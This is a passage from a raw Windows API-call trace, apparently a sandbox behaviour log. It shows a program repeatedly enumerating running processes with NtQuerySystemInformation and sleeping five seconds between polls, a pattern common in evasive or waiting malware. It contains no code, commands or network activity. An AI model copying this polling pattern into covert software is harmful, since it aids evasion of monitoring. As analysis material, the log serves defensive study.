BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.274] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.284] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.293] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.301] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.302] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.305] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.305] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.311] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.332] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.349] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.350] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.357] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.360] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.367] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.379] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.384] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.385] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.394] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.397] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.404] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.410] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.411] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.412] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.419] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.420] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.423] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.432] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.437] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.438] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0219.442] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0219.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0219.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0219.448] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0219.450] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0219.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0219.452] NtQuerySystemInformation (in: 